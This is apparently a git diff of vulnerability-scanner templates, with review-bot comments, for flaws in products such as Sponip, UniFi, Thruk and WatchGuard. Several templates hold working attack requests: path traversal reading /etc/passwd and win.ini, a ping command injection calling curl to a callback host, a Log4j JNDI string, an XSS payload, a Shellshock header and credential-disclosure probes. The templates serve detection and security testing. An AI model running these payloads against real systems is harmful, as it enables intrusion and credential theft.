-24,7 +25,7 @@ requests: - type: regex part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/servicenow-helpdesk-credential.yaml b/vulnerabilities/other/servicenow-helpdesk-credential.yaml new file mode 100644 index 0000000000..0d97219391 --- /dev/null +++ b/vulnerabilities/other/servicenow-helpdesk-credential.yaml 
@@ -0,0 +1,33 @@ +id: servicenow-helpdesk-credential + +info: + name: ServiceNow Helpdesk Credential Exposure + author: ok_bye_now + severity: high + description: Detection of exposed credentials in help the help desk JS file. + reference: + - https://jordanpotti.com/2021/02/21/ServiceNow-HelpTheHelpDeskAndTheHackers/ + tags: servicenow,exposure + +requests: + - method: GET + path: + - "{{RootURL}}/HelpTheHelpDesk.jsdbx" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'var httpPassword = "encrypt:' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - 'var server = "([a-z:/0-9.-]+)"' \ No newline at end of file diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index 574d070ebd..8b382f16d5 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -4,7 +4,8 @@ info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - reference: https://github.com/star7th/showdoc/pull/1059 + reference: + - https://github.com/star7th/showdoc/pull/1059 tags: rce,fileupload,showdoc requests: diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index 41f8cba47a..5f0c2f5855 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -4,12 +4,12 @@ info: name: Sick Beard XSS author: pikpikcu severity: medium - tags: xss reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link metadata: shodan-query: sickbeard + tags: xss requests: - method: GET diff --git a/vulnerabilities/other/sl-studio-lfi.yaml b/vulnerabilities/other/sl-studio-lfi.yaml new file mode 100644 index 0000000000..15e7f3d46c --- /dev/null +++ b/vulnerabilities/other/sl-studio-lfi.yaml 
@@ -0,0 +1,26 @@ +id: sl-studio-lfi + +info: + name: Webbdesign SL-Studio Directory Traversal + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018110187 + metadata: + google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' + tags: slstudio,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml new file mode 100644 index 0000000000..88c4402fbb --- /dev/null +++ b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -0,0 +1,27 @@ +id: sofneta-mecdream-pacs-lfi + +info: + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + author: 0x_akoko + severity: high + description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + reference: + - https://www.exploit-db.com/exploits/45347 + - https://www.softneta.com/products/meddream-pacs-server/downloads.html + metadata: + google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login + tags: sofneta,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml index 7e3f5cd21d..bc839a4439 100644 --- a/vulnerabilities/other/solar-log-authbypass.yaml +++ b/vulnerabilities/other/solar-log-authbypass.yaml 
@@ -4,8 +4,12 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server - reference: https://www.exploit-db.com/exploits/49986 + description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows + arbitrary remote attackers gain administrative privileges by connecting to the server. + reference: + - https://www.exploit-db.com/exploits/49986 + classification: + cwe-id: CWE-284 tags: solarlog,auth-bypass requests: @@ -30,3 +34,5 @@ requests: - " Solare Datensysteme GmbH" - "mailto:info@solar-log.com" condition: and + +# Enhanced by mp on 2022/04/12 diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index e2fc51ac29..d82664d278 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -22,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: diff --git a/vulnerabilities/other/spark-webui-unauth.yaml b/vulnerabilities/other/spark-webui-unauth.yaml index fdc11f53c8..6ca1120cb0 100644 --- a/vulnerabilities/other/spark-webui-unauth.yaml +++ b/vulnerabilities/other/spark-webui-unauth.yaml @@ -1,9 +1,11 @@ id: spark-webui-unauth + info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc tags: spark,unauth requests: 
diff --git a/vulnerabilities/other/sponip-network-system-ping-rce.yaml b/vulnerabilities/other/sponip-network-system-ping-rce.yaml new file mode 100644 index 0000000000..98ed9e10b1 --- /dev/null +++ b/vulnerabilities/other/sponip-network-system-ping-rce.yaml @@ -0,0 +1,25 @@ +id: sponip-network-system-ping-rce + +info: + name: Sponip Network System Ping RCE + author: pikpikcu + severity: critical + reference: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 + tags: sponip,rce,oast,network + +requests: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1 + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" diff --git a/vulnerabilities/other/symantec-messaging-gateway.yaml b/vulnerabilities/other/symantec-messaging-gateway.yaml index 4bab74cd1c..ab5c216ab1 100644 --- a/vulnerabilities/other/symantec-messaging-gateway.yaml +++ b/vulnerabilities/other/symantec-messaging-gateway.yaml @@ -5,7 +5,7 @@ info: author: Random_Robbie severity: medium description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - tags: lfi + tags: lfi,messaging,symantec requests: - method: GET diff --git a/vulnerabilities/other/tamronos-rce.yaml b/vulnerabilities/other/tamronos-rce.yaml index 03c27beac8..581c85bc75 100644 --- a/vulnerabilities/other/tamronos-rce.yaml +++ b/vulnerabilities/other/tamronos-rce.yaml 
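Review bot: The POST body in the new sponip template names the first parameter `sondata[ip]` while the second is `jsondata[type]`; if the application reads `jsondata[ip]`, the injected ping argument never reaches the command and the template silently never fires. It reads like a dropped `j`, so the body should be `jsondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1`; please re-verify the parameter name against the referenced write-up. While touching it, add a `description`, since the info block currently has none for a critical RCE check.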
@@ -1,10 +1,21 @@ id: tamronos-rce info: - name: TamronOS IPTV/VOD RCE + name: TamronOS IPTV/VOD - Remote Command Execution author: pikpikcu severity: critical - reference: https://twitter.com/sec715/status/1405336456923471874 + description: | + TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint. + reference: + - https://twitter.com/sec715/status/1405336456923471874 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-78 + metadata: + verified: true + shodan-query: title:"TamronOS IPTV系统" + fofa-query: title="TamronOS IPTV系统" tags: tamronos,rce requests: @@ -17,8 +28,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by cs on 2022/05/13 diff --git a/vulnerabilities/other/tekon-info-leak.yaml b/vulnerabilities/other/tekon-info-leak.yaml new file mode 100644 index 0000000000..f75dbc2382 --- /dev/null +++ b/vulnerabilities/other/tekon-info-leak.yaml @@ -0,0 +1,36 @@ +id: tekon-info-leak + +info: + name: Tekon - Unauthenticated Log Leak + author: gy741 + severity: low + description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device + reference: + - https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38 + metadata: + shodan-query: title:"контроллер" + tags: tekon,exposure,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/log.cgi' + + max-size: 2048 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "-- Logs begin at" + - "end at" + condition: and + + - type: word + part: header + words: + - "text/plain" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml index 05a87a54d0..90dc713ceb 100644 
--- a/vulnerabilities/other/thinkific-redirect.yaml +++ b/vulnerabilities/other/thinkific-redirect.yaml @@ -6,7 +6,6 @@ info: severity: medium tags: redirect - requests: - method: GET diff --git a/vulnerabilities/other/thruk-xss.yaml b/vulnerabilities/other/thruk-xss.yaml new file mode 100644 index 0000000000..5a5051619b --- /dev/null +++ b/vulnerabilities/other/thruk-xss.yaml @@ -0,0 +1,35 @@ +id: thruk-xss + +info: + name: Thruk Monitoring Webinterface - XSS + author: pikpikcu + severity: medium + reference: + - https://www.thruk.org/download.html + tags: xss,thruk + +requests: + - raw: + - | + POST /thruk/cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/thruk/cgi-bin/login.cgi?thruk + + referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" diff --git a/vulnerabilities/other/tianqing-info-leak.yaml b/vulnerabilities/other/tianqing-info-leak.yaml new file mode 100644 index 0000000000..127dc0bce8 --- /dev/null +++ b/vulnerabilities/other/tianqing-info-leak.yaml @@ -0,0 +1,33 @@ +id: tianqing-info-leak + +info: + name: Tianqing Info Leak + author: ritikchaddha + severity: medium + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + tags: tianqing,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/dbstat/gettablessize" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "schema_name" + - "table_name" + - "table_size" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/tikiwiki-json-rpc.yaml b/vulnerabilities/other/tikiwiki-json-rpc.yaml new file mode 100644 index 0000000000..8d026c20d8 
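Review bot: The body matcher in the new thruk-xss template is an empty string (`- ""`), which matches every response, so the template fires on any Thruk login page that answers 200 with text/html whether or not the payload is reflected. If the committed file really contains the empty string rather than this being lost in rendering, the word should be the reflected payload, e.g. `- "</script><script>alert(document.domain)</script>"`. The `Referer` header also uses `{{Hostname}}` with no scheme; `Referer: {{BaseURL}}/thruk/cgi-bin/login.cgi?thruk` is the usual form.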
--- /dev/null +++ b/vulnerabilities/other/tikiwiki-json-rpc.yaml @@ -0,0 +1,44 @@ +id: kiwitcms-json-rpc + +info: + name: Kiwi TCMS Information Disclosure + author: act1on3 + severity: high + reference: + - https://hackerone.com/reports/968402 + - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/ + - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml + metadata: + shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 + tags: kiwitcms,exposure,misconfig + +requests: + - raw: + - | + POST /json-rpc/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + + {"jsonrpc":"2.0","method":"User.filter","id": 1,"params":{"query":{"is_active":true}}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - result + - username + - jsonrpc + - is_active + condition: and + + extractors: + - type: json + part: body + json: + - .result[].username \ No newline at end of file diff --git a/vulnerabilities/other/tongda-session-disclosure.yaml b/vulnerabilities/other/tongda-session-disclosure.yaml new file mode 100644 index 0000000000..dc5a99f94f --- /dev/null +++ b/vulnerabilities/other/tongda-session-disclosure.yaml @@ -0,0 +1,33 @@ +id: tongda-session-disclosure + +info: + name: Tongda User Session Disclosure + author: ritikchaddha + severity: medium + reference: + - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ + tags: tongda,disclosure + +requests: + - method: POST + path: + - "{{BaseURL}}/general/userinfo.php?UID=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"dept_name":"' + - '"online_flag":' + condition: and + + - type: word + part: header + words: + - "application/json" + condition: and + + - type: status + status: + - 200 
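Review bot: The new file is named `tikiwiki-json-rpc.yaml` but declares `id: kiwitcms-json-rpc` and targets Kiwi TCMS, so the filename matches neither the template id nor the product, and a tikiwiki name will mislead anyone grepping by product. Rename the file to `vulnerabilities/other/kiwitcms-json-rpc.yaml` so id and filename agree as elsewhere in the repo. Separately, the `.result[].username` extractor prints every active account name into scan output; that is reasonable for a disclosure check, but the info block has no `description`, and one line noting that the finding enumerates usernames would help whoever triages it.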
diff --git a/vulnerabilities/other/tpshop-directory-traversal.yaml b/vulnerabilities/other/tpshop-directory-traversal.yaml index 47af9e5038..e88bb55f43 100644 --- a/vulnerabilities/other/tpshop-directory-traversal.yaml +++ b/vulnerabilities/other/tpshop-directory-traversal.yaml @@ -4,7 +4,8 @@ info: name: TPshop Directory Traversal author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA + reference: + - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA tags: tpshop,lfi requests: diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml index a44e962186..2f99cb2f82 100644 --- a/vulnerabilities/other/turbocrm-xss.yaml +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. - reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + reference: + - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a tags: xss,turbocrm requests: diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index 733c46e297..7707e6a4e8 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -1,4 +1,5 @@ id: ueditor-file-upload + info: name: UEditor Arbitrary File Upload author: princechaddha diff --git a/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/vulnerabilities/other/unauth-hoteldruid-panel.yaml index 921549ed63..128e2e78c0 100644 --- a/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/vulnerabilities/other/unauth-hoteldruid-panel.yaml 
@@ -1,10 +1,17 @@ id: unauth-hoteldruid-panel + info: - name: Unauthenticated Hoteldruid Panel + name: Hoteldruid Management Panel Access author: princechaddha severity: high description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. - reference: https://www.hoteldruid.com/ + reference: + - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42949.json + - https://www.hoteldruid.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: hoteldruid,panel,unauth requests: @@ -26,3 +33,5 @@ requests: - "INSERT:" - "TABLES:" condition: and + +# Enhanced by mp on 2022/03/24 diff --git a/vulnerabilities/other/unauth-rlm.yaml b/vulnerabilities/other/unauth-rlm.yaml new file mode 100644 index 0000000000..057a35f077 --- /dev/null +++ b/vulnerabilities/other/unauth-rlm.yaml @@ -0,0 +1,23 @@ +id: unauth-rlm + +info: + name: Unauthenticated Reprise License Manager + author: Akincibor + severity: critical + tags: unauth,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/menu" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Administration Commands" \ No newline at end of file diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml index 56ccbcbe76..504318c39a 100644 --- a/vulnerabilities/other/unauth-spark-api.yaml +++ b/vulnerabilities/other/unauth-spark-api.yaml 
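Review bot: The classification added to unauth-hoteldruid-panel uses `cwe-id: CWE-522` (Insufficiently Protected Credentials), while the description says the management portal is reachable without authentication, which is CWE-306 (Missing Authentication for Critical Function). Unless the referenced PoC specifically concerns stored credentials, `cwe-id: CWE-306` describes the finding better. The cvss vector is metadata only, so this does not affect matching.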
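Review bot: The new unauth-rlm template is marked `severity: critical` but has no `description` and no `reference`, so a reader cannot tell what reaching `/goforms/menu` without a session actually grants. The only evidence in the template is a title-string match, which establishes that the RLM web administration menu is reachable, not that anything executes; either document why that is critical or align with the panel-exposure templates nearby (unauth-hoteldruid-panel in this same diff uses `high`). At minimum add `description: The Reprise License Manager web administration interface is reachable without authentication.` and a vendor or advisory `reference`.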
@@ -1,10 +1,17 @@ id: unauth-spark-api + info: name: Unauthenticated Spark REST API author: princechaddha severity: medium - description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. - reference: https://xz.aliyun.com/t/2490 + description: The Spark product's REST API interface allows access to unauthenticated users. + reference: + - https://xz.aliyun.com/t/2490 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + remediation: Restrict access the exposed API ports. tags: spark,unauth requests: @@ -22,3 +29,5 @@ requests: - "serverSparkVersion" part: body condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/vulnerabilities/other/unifi-network-log4j-rce.yaml b/vulnerabilities/other/unifi-network-log4j-rce.yaml new file mode 100644 index 0000000000..8d823b5ac7 --- /dev/null +++ b/vulnerabilities/other/unifi-network-log4j-rce.yaml 
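Review bot: The classification added to unauth-spark-api is internally inconsistent: `severity: medium` sits next to `cvss-score: 10.0` with a C:H/I:H/A:H vector, and `cwe-id: CWE-77` (command injection) is attached to a finding the description calls unauthenticated API access. If the reference shows the REST API can be used to submit applications, the severity should move to critical and the description should say so; otherwise bring the CVSS and CWE down to what the matcher proves, e.g. `cwe-id: CWE-306`. The remediation line also drops a word: `remediation: Restrict access to the exposed API ports.`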
@@ -0,0 +1,43 @@ +id: unifi-network-log4j-rce + +info: + name: UniFi Network Log4j JNDI RCE + author: KrE80r + severity: critical + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application . + reference: + - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e + - https://twitter.com/sprocket_ed/status/1473301038832701441 + metadata: + shodan-query: http.title:"UniFi Network" + tags: rce,log4j,ubnt,unifi,oast,jndi + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=utf-8 + Origin: {{RootURL}} + Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage + + {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" # Confirms the DNS Interaction + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/vulnerabilities/other/vanguard-post-xss.yaml b/vulnerabilities/other/vanguard-post-xss.yaml index c788fa2b9f..aec8293448 100644 --- a/vulnerabilities/other/vanguard-post-xss.yaml +++ b/vulnerabilities/other/vanguard-post-xss.yaml 
@@ -5,7 +5,8 @@ info: author: ImNightmaree severity: medium description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box - reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html tags: vanguard,xss requests: diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml index 199d945cd7..c17f20c71a 100644 --- a/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -5,7 +5,8 @@ info: author: geeknik severity: low description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. - reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system + reference: + - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc requests: diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml deleted file mode 100644 index 8b0edcd260..0000000000 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: visual-tools-dvr-rce - -info: - name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) - author: gy741 - severity: critical - description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://www.exploit-db.com/exploits/50098 - tags: visualtools,rce,oast - -requests: - - raw: - - | - GET /cgi-bin/slogin/login.py HTTP/1.1 - Host: {{Hostname}} - Accept: */* - User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index a59b7b3bd1..1dcb73f600 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,8 +5,10 @@ info: author: dwisiswant0 severity: high description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. - reference: https://www.exploit-db.com/exploits/48877 + reference: + - https://www.exploit-db.com/exploits/48877 tags: auth-bypass + requests: - raw: - | diff --git a/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/vulnerabilities/other/watchguard-credentials-disclosure.yaml new file mode 100644 index 0000000000..acbdf45a0a --- /dev/null +++ b/vulnerabilities/other/watchguard-credentials-disclosure.yaml 
@@ -0,0 +1,32 @@ +id: watchguard-credentials-disclosure + +info: + name: WatchGuard Fireware AD Helper Component - Credentials Disclosure + author: gy741 + severity: critical + description: A credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory + credentials for a Windows domain in plaintext. + reference: + - https://www.exploit-db.com/exploits/48203 + - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability + tags: watchguard,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"fullyQualifiedName"' + - '"logonDomain"' + - '"username"' + - '"password"' + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml index 384fe2d49f..57b71c0d34 100644 --- a/vulnerabilities/other/webui-rce.yaml +++ b/vulnerabilities/other/webui-rce.yaml @@ -1,13 +1,14 @@ id: webui-rce + info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 + reference: + - https://www.exploit-db.com/exploits/36821 tags: webui,rce - requests: - method: GET path: diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index db201ad502..951a568d3d 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml 
@@ -1,13 +1,14 @@ id: wems-manager-xss info: - name: WEMS Enterprise Manager XSS + name: WEMS Enterprise Manager - Cross-Site Scripting author: pikpikcu severity: medium - tags: xss - description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the + 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html + tags: xss requests: - method: GET @@ -25,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/WooYun-2015-148227.yaml b/vulnerabilities/other/wooyun-2015-148227.yaml similarity index 86% rename from vulnerabilities/other/WooYun-2015-148227.yaml rename to vulnerabilities/other/wooyun-2015-148227.yaml index fba7ec1520..4a65d8356a 100644 --- a/vulnerabilities/other/WooYun-2015-148227.yaml +++ b/vulnerabilities/other/wooyun-2015-148227.yaml @@ -1,10 +1,12 @@ -id: WooYun-2015-148227 +id: wooyun-2015-148227 + info: name: Seeyon WooYun LFR author: princechaddha severity: high description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker. - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + reference: + - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html tags: seeyon,wooyun,lfi requests: diff --git a/vulnerabilities/other/wooyun-path-traversal.yaml b/vulnerabilities/other/wooyun-path-traversal.yaml index 3956371181..32f0591370 100644 --- a/vulnerabilities/other/wooyun-path-traversal.yaml 
+++ b/vulnerabilities/other/wooyun-path-traversal.yaml @@ -4,12 +4,13 @@ info: name: Wooyun Path Traversal author: pikpikcu severity: high - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html description: | A general document of UFIDA ERP-NC contains a vulnerability (affecting a large number of well-known school government and enterprise cases such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) - tags: lfi + reference: + - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + tags: lfi,wooyun requests: - method: GET @@ -26,4 +27,4 @@ requests: - - part: body - condition: and \ No newline at end of file + condition: and diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index b972d9a3d9..2fea61f35d 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -1,9 +1,11 @@ id: wuzhicms-sqli + info: name: Wuzhicms v4.1.0 SQL Injection author: princechaddha severity: high - reference: https://github.com/wuzhicms/wuzhicms/issues/184 + reference: + - https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli requests: diff --git a/vulnerabilities/other/xdcms-sqli.yaml b/vulnerabilities/other/xdcms-sqli.yaml index c0204fd48c..aff7f9d904 100644 --- a/vulnerabilities/other/xdcms-sqli.yaml +++ b/vulnerabilities/other/xdcms-sqli.yaml @@ -4,7 +4,8 @@ info: name: XdCMS SQL Injection author: pikpikcu severity: high - reference: https://www.uedbox.com/post/35188/ + reference: + - https://www.uedbox.com/post/35188/ tags: sqli,xdcms requests: diff --git a/vulnerabilities/other/xerox-efi-lfi.yaml b/vulnerabilities/other/xerox-efi-lfi.yaml new file mode 100644 index 0000000000..3bed6e8b43 --- /dev/null +++ b/vulnerabilities/other/xerox-efi-lfi.yaml 
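Review bot: wooyun-path-traversal now lists the same reference, `https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html`, as the Seeyon template wooyun-2015-148227 elsewhere in this diff, yet its description is about a UFIDA ERP-NC document endpoint; one WooYun bug id is unlikely to be the source for both a Seeyon LFR and a UFIDA traversal, so one of the two references is probably wrong. Please confirm which WooYun id the UFIDA finding came from and correct this reference. A product tag such as `tags: lfi,wooyun,ufida` would also keep it from being grouped with the Seeyon template.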
